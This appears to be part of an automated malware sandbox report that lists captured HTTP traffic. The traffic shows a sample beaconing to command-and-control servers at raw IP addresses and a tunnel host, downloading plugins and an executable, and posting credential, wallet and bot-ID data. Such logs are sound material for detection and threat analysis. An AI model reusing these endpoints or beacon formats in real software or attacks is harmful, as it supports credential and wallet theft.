Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: GET /enigma/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: GET /lend/build12.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 38 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000187001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: GET /lend/build12.exe HTTP/1.1Host: 193.233.132.167If-Modified-Since: Fri, 19 Apr 2024 00:20:52 GMTIf-None-Match: "6621b8e4-17e00"
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /enigma/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-AliveData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnect xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 38 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000188001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-AliveData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnect xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----NDYyMQ==Host: 193.233.132.167Content-Length: 4781Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
